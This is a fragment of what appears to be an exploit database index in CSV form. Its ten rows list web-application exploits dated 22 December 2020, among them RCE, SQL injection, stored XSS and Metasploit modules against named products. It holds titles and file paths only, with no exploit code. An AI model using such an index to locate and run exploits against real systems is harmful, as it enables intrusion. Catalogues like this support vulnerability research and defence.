49310,exploits/php/webapps/49310.txt,"Victor CMS 1.0 - File Upload To RCE",2020-12-22,Mosaaed,webapps,php,
49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",2020-12-22,"Matthew Aberegg",webapps,php,
49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",2020-12-22,"Musyoka Ian",webapps,php,
49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
49316,exploits/php/webapps/49316.txt,"Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
49317,exploits/php/webapps/49317.rb,"WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-22,"SunCSR Team",webapps,php,
49318,exploits/linux/webapps/49318.rb,"Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)",2020-12-22,AkkuS,webapps,linux,
49319,exploits/php/webapps/49319.txt,"Artworks Gallery Management System 1.0 - 'id' SQL Injection",2020-12-22,"Vijay Sachdeva",webapps,php,
49320,exploits/php/webapps/49320.txt,"Faculty Evaluation System 1.0 - Stored XSS",2020-12-22,"Vijay Sachdeva",webapps,php,
49321,exploits/linux/webapps/49321.py,"TerraMaster TOS 4.2.06 - RCE (Unauthenticated)",2020-12-22,IHTeam,webapps,linux,
